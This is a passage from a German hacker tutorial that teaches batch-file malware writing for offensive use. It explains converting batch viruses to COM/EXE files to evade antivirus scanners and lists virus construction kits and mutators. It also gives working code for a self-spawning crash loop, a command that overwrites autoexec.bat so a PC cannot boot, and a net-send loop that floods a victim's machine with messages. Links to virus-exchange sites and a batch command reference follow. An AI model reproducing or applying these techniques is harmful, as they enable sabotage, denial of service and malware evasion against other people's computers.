AVP-Hersteller tun das, um die Virensignaturen (ihr Kapital) vor der Konkurrenz zu verstecken. Typische Laufzeitverschlüssler sind Cryptexe, PE-Crypt und PE-Lock. Cracker täuschen mit diesen Programmen Viren- und Trojaner-Scanner. ----------------------------------------------------------------------------------------------------------------------------- 10. Programmieren eines COM-Viruses ----------------------------------------------------------------------------------------------------------------------------- Die meisten Leute klicken nicht gerne auf Dateien mit der Endung BAT. Deshalb ist es besser, deinen BAT-Virus in eine EXE, COM oder SCR-Datei zu konvertieren. Die BAT-Viren sind nach dem Konvertieren auch besser vor AVP geschützt. Konvertiert man z.B. den BAT.QuickFormat.Trojan vom BAT zum EXE-Format, wird er nicht mehr erkannt, obwohl es eigentlich immer noch der selbe Virus ist, auch nach dem Konvertieren! Naja... Aber wie geht das Konvertieren denn nu? Hier steht's: Lade dir erst einmal den Converter BAT2COM, BAT2EXE oder BAT2EXEC aus dem Internet herunter. Du findest es auf www.filelibrary.com/Contents/DOS/54/94.html zum direkten Download, oder auf http://home.wanadoo.nl/source, wo es noch viele andere Converter gibt. Falls diese Links nicht mehr funzen, suche per Suchmaschine nach diesen drei Utilities. Das Konvertieren: 1. Speichere die zu konvertierende Batchdatei in einem leicht erreichbaren Verzeichnis, wie z.B. C:\bat2exe, und lege den BAT2EXE-Converter in dem selben Verzeichnis ab. 2. öffne die Eingabeaufforderung und wechsel nach c:\bat2exe. 3. Nun konvertiere nach dem Schema "[Name des Converters] [Zu konventierender Batchjob]". z.B.: bat2exe virus.bat 4. Bei diesem Beispiel wird der Virus nun im BAT2EXE-Verzeichnis als virus.com zu finden sein. Du wirst dich bestimmt fragen: "Hä? Aber das Prog heißt doch BAT2EXE und nicht BAT2COM!" Keine Angst! Das ist das Gleiche! Du kannst die COM-File ja einfach in eine EXE-File umbenennen, das ist die harte Tour aber funzt meistens. Eine andere Methode ist, die File mit dem EXE2COM-Converter zu konvertieren. 5. Heraus kommt der Virus im COM-Format, was durch die Endung wie ein richtiges Programm aussieht ... und auch ein solches ist! Diese virus.com macht (fast) hundertprozentig dasselbe wie die ursprüngliche Stapelverarbeitungsdatei! ----------------------------------------------------------------------------------------------------------------------------- 11. Tools zum Schreiben von BAT-Malware ----------------------------------------------------------------------------------------------------------------------------- VCKs: ************************* BAT Worm Generator BAT Trojan Generator CcT's Malware Construction Kit Converter: ************************* BAT2COM BAT2EXE / BAT2EXEC CcT's BAT-Editor Mutatoren: ************************* ADVANCED BATCH MUTATOR CcT's BAT-Editor ----------------------------------------------------------------------------------------------------------------------------- 12. Andere coole Batchfunktionen ----------------------------------------------------------------------------------------------------------------------------- 1. Systemcrash per GOTO und START Viele PCs kann man mit folgendem Inhalt einer Batchdatei abstürzen lassen: :Loop start %0 goto :Loop Startet man diese Killerbatch, führt sich die Datei selbst (%0) immer wieder (goto) mit hoher Geschwindigkeit in neuen Fenstern (start) aus, was viele Systeme zum Absturz bringt. Diese Datei habe ich nach viel Nachdenken, wie man einen PC per BAT crasht, erfunden. 2. System startet nicht per goto Gebe einfach ein: echo :Loop > C:\autoexec.bat echo goto :Loop >> C:\autoexec.bat und speichere als Batch. Bei Neustart wird per GOTO-Befehl eine unendlich lange Warteschleife in der autoexec.bat erzeugt und das System startet nur noch per Boot-Diskette/CD. (Nicht bei allen Systemen!!!) ----------------------------------------------------------------------------------------------------------------------------- 13. Links ----------------------------------------------------------------------------------------------------------------------------- * http://www.hacker-tools.de/ Das größte deutsche Hacker-Tools-Archiv (Meine Lieblings-Hacking-Site!) * http://vx.netlux.org/ Meine Lieblings Viren-Site: Haufenweise Tutorials, Quellcodes, VCKs, Virus Collection Tools und Mutatoren * http://home.wanadoo.nl/source/ Meine Lieblings Converter-Site * http://www.darmzerfetzer.de.vu/ Meine Homepage * http://www.coderz.net/ Eine Viren-Site ähnlich vx.netlux.org * http://www.ccc.de/ Die Homepage des legendären deutschen Computer Chaos Clubs * http://www.computec.ch/ Die Homepage des Sicherheitsspezialisten Marc Ruef mit haufenweise Hacker-Tutorials * http://www.thecyberbrothers.com/products/ctgen.html Der Cool Text Generator wandelt normale Wörter in die Hacker-Schrift um ----------------------------------------------------------------------------------------------------------------------------- 14. Die Hacker-Sprache ----------------------------------------------------------------------------------------------------------------------------- AVP = Abkürzung für 'AntiViren Programme' CcT = Der Hackername des Autores dieses Tutorials. Abk. für 'Cool CyberTerrorist'. funzen = (Verb) Anderer Ausdruck für funktionieren. HPCV = Hackerbegriff: "Hacking, Phreaking, Cracking, Virus writing" H/P/V/C/W/A = Hacker-Allgemeinbegriff. Abk. für "Hacking, Phreaking, Virus writing, Cracking, Warez, Anarchy" lame = (Adjektiv) Anderer Ausdruck für dumm, anfängerlich, unprofessionell. Lamer = (Substantiv) Eine Beleidigung für eine für den Computer unfähige Person. Kurz gesagt, den Otto-Normal-User. Script Kiddys = Junge Leute, die vom Hacken nix verstehen und versuchen, nach Anleitungen, ohne Kenntnisse, zu hacken. VCK = Abkürzung für Virus Construction Kit Virus Trader = Leute, die Viren miteinander tauschen. Virus Trading = Das machen die Virus Traders. VX = Abkürzung für Virus Exchange. ----------------------------------------------------------------------------------------------------------------------------- 14. Hinweise & Tippz ----------------------------------------------------------------------------------------------------------------------------- Hier eine Liste der wichtigsten BAT-Begriffe: Wichtige Befehle: ASSOC Zeigt die Zuordnungen der Dateierweiterungen an oder ändert sie. AT Plant die Ausführung von Befehlen und Programmen auf einem Computer. ATTRIB Zeigt Dateiattribute an oder ändert sie. BREAK Schaltet (zusätzliche) überwachung für STRG+C ein (ON) oder aus (OFF). CACLS Zeigt die Zugriffskontrollisten (ACL) der Dateien an oder ändert sie. CALL Ruft ein Stapelverarbeitungsprogramm von einem anderen aus auf. CD Wechselt das aktuelle Verzeichnis oder zeigt dessen Namen an. CHCP Wechselt die aktuelle Codeseite oder zeigt deren Nummer an. CHDIR Wechselt das aktuelle Verzeichnis oder zeigt dessen Namen an. CHKDSK überprüft einen Datenträger und zeigt einen Statusbericht an. CHOICE Wartet auf den Druck einer bestimmten Taste. CLS Löscht den Bildschirminhalt. CMD Startet eine neue Instanz des Windows-Befehlsinterpreters. COLOR Legt die Standardfarben für den Konsolenhinter- und Vordergrund fest. COMP Vergleicht den Inhalt zweier Dateien oder zweier Sätze von Dateien. COMPACT Zeigt die Komprimierung der Dateien auf NTFS-Partitionen an oder ändert sie. CONVERT Konvertiert FAT-Datenträger in NTFS. Das aktuelle Laufwerk kann nicht konvertiert werden. COPY Kopiert eine oder mehrere Dateien an eine andere Position. DATE Wechselt das eingestellte Datum oder zeigt es an. DEL Löscht eine oder mehrere Dateien. DELTREE Löscht einen komplette Verzeichnisbaum. DIR Listet die Dateien und Unterverzeichnisse eines Verzeichnisses auf. DISKCOMP Vergleicht den Inhalt zweier Disketten. DISKCOPY Kopiert den Inhalt einer Diskette auf eine andere Diskette. DOSKEY Bearbeitet Befehlseingaben, ruft Befehle zurück und erstellt Makros. ECHO Zeigt Meldungen an oder schaltet die Befehlsanzeige ein/aus (ON/OFF). Kann einen angegebenen Text auch in Dateien schreiben. ENDLOCAL Beendet die Begrenzung des Gültigkeitsbereiches von änderungen. ERASE Löscht eine oder mehrere Dateien. EXIT Beendet den Befehlsinterpreter CMD.EXE. FC Vergleicht zwei Dateien oder zwei Sätze von Dateien. FIND Sucht in einer oder mehreren Dateien nach einer Zeichenfolge. FINDSTR Sucht nach Zeichenketten in Dateien. FINGER Snifft die Daten eines Hosts FOR Führt einen Befehl für jede Datei eines Satzes von Dateien aus. FORMAT Formatiert einen Datenträger für die Verwendung unter Windows. FTYPE Zeigt die Dateitypen an, die bei den Dateierweiterungszuordnungen verwendet werden, oder ändert sie. GOTO Setzt die Ausführung eines Stapelverarbeitungsprogramms an einer Marke fort. GRAFTABL Ermöglicht Windows, im Grafikmodus einen erweiterten Zeichensatz anzuzeigen. HELP Zeigt Hilfe für Windows-Befehle an. IF Verarbeitet Ausdrücke mit Bedingungen in einem Stapel- verarbeitungsprogramm. KEYB Stellt die Tastaturbelegung für ein bestimmtes Land ein. LABEL Erstellt, ändert oder löscht die Bezeichnung eines Datenträgers. MD Erstellt ein Verzeichnis. MKDIR Erstellt ein Verzeichnis. MODE Konfiguriert Geräte im System. MORE Zeigt Daten seitenweise auf dem Bildschirm an. MOVE Verschiebt eine oder mehrere Dateien. NBTSTAT Listet aktuelle TCP/IP-Verbindungen auf. NET Sammlung verschiedener Netzwerkbefehle. Liste per NET /? NSLOOKUP Hostbefehle PATH Legt den Suchpfad für ausführbare Dateien fest oder zeigt diesen an. PAUSE Hält die Ausführung einer Stapelverarbeitungsdatei an. PING Pingt einen Host an POPD Wechselt zu dem Verzeichnis, das durch PUSHD gespeichert wurde. PRINT Druckt Textdateien während der Verwendung anderer MS-DOS-Befehle. PROMPT Modifiziert die Windows-Eingabeaufforderung. RD Entfernt (löscht) ein Verzeichnis. RECOVER Stellt von einem beschädigten Datenträger lesbare Daten wieder her. REM Leitet Kommentare in einer Stapelverarbeitungsdatei oder in der Datei CONFIG.SYS ein. REN Benennt eine oder mehrere Dateien um. RENAME Benennt eine oder mehrere Dateien um. REPLACE Ersetzt Dateien. RESTORE Stellt mit BACKUP gesicherte Daten wieder her. RMDIR Entfernt (löscht) ein Verzeichnis. SET Setzt oder entfernt Windows-Umgebungsvariablen oder zeigt sie an. SETLOCAL Startet die Begrenzung des Gültigkeitsbreiches von änderungen. SHIFT Verändert die Position ersetzbarer Parameter in einem Stapelverarbeitungsprogramm. SORT Gibt Eingabe sortiert auf Bildschirm, Datei oder anderes Gerät aus. SUBST Weist einem Pfad eine Laufwerksbezeichnung zu. START Startet ein eigenes Fenster, um das Programm auszuführen. TFTP FTP-Befehl TIME Stellt die Systemzeit ein oder zeigt sie an. TREE Zeigt die Verzeichnisstruktur eines Laufwerks oder Pfads grafisch an. TYPE Zeigt den Inhalt einer Textdatei an. VER Zeigt die Nummer der verwendeten Windows-Version an. VERIFY Legt fest, ob MS-DOS überwachen soll, daá Dateien korrekt auf Datenträger geschrieben werden. VOL Zeigt die Bezeichnung und Seriennummer eines Datenträgers an. XCOPY Kopiert Dateien und Verzeichnisstrukturen. Wichtige Umgebungsvariablen: WINDIR Der Windowsordner USERPROFILE Das Benutzerprofilverzeichnis OS Das Windowssystem PATH Der Windows und DOS-Befehlspfad USERDOMAIN Die Userdomain USERNAME Der Username TEMP Der Temp-Pfad PATHEXT Die DOS-Zugriffs Dateiendungen Hier eine Beispiel-BAT zum Testen der Variablen auf deinem Rechner: @echo off echo CcT's Batchsniffer echo ------------------ echo. echo Benutzer: %username% echo Computername: %userdomain% echo System: %os% echo Profilverzeichnis: %userprofile% echo. echo Temp-Pfad: %temp% echo Windows-Verzeichnis: %windir% echo Systemlaufwerk: %systemdrive% echo. echo Pfad dieser Datei: %0 pause>nul ----------------------------------------------------------------------------------------------------------------------------- 14. Sonstige BatchhackZ ----------------------------------------------------------------------------------------------------------------------------- Nachrichtendienstbomben: Mit Hilfe des Nachrichtendienstes und der IP/Host-Adresse PCs kann man auch PCs bomben. Starte als erstes die Eingabeaufforderung und gebe dort den NET-SEND-Befehl mit folgender Syntax ein: net send [IP-Adresse] [Nachricht] Die IP wird nun deine Nachricht erhalten. Schreibe nun eine Batchdatei (*.bat) mit diesem Inhalt, wobei die IP und die Nachricht in die eckigen Klammern eingefügt wird. z.B.: net send 192.168.0.120 HACKED!! Startest du nun die File, erhält die IP 192.168.0.120 die Message "Hacked!!" (mit "Nachrichtendienst" als überschrift). Um das Opfer nun mit mehreren Nachrichten zu bomben, musst du den GOTO-Befehl verwenden: :Loop net send 192.168.0.120 HACKED!! goto :Loop Der GOTO-Befehl lässt die Batchdatei nun immer wieder ausführen und der PC des Opfers wird mit Messages überflutet, was bei den meisten Usern zum freiwilligen Trennen der Verbindung führt. Wenn man das Script schließt hört das Bomben beim Opfer natürlich auf. Deshalb wird empfohlen, die Datei möglichst lange ausführen zu lassen, da der User dann keine Klickchance mehr hat. Je schneller dein Computer, desto mehr Messages. Arbeitet oder spielt man mit Freunden per Netzwerk, muss es nicht unbedingt die IP sein, möglich ist auch der korrekt geschriebene Name, den die Person im Netzwerk verwendet. Der Schutz vor diesem bösartigen Killer ist leicht. 1. Möglichkeit: Deaktiviere einfach den Nachrichtendienst unter Systemsteuerung/Verwaltung/Dienste und du bist von nervigen Messages des Standarddienstes befreit. 2. Möglichkeit: Zu dem obrigen Menü gelangst du auch über "Ausführen". Gebe dort einfach den Befehl SERVICES.MSC ein und fahre fort ... 3. Möglichkeit: Der Nachrichtendienst muss auch aktiviert sein, wenn DU jemanden bomben willst. Ist der Dienst auf manuell eingestellt, kannst du ihn mit dem Befehl NET START MESSENGER einschalten und mit dem Befehl NET STOP MESSENGER beenden. Wer keine Lust hat, ständig eine eigene Batchdatei mit der neuen IP zu schreiben, der sollte mein Tool CcT's NetBomber verwenden. Dazu muss der Nachrichtendienst bei dir aber auf manuell eingestellt sein!! ************************************************************************************************* Ich hoffe der Kurs hat euch Spaß gemacht. - Euer CcT!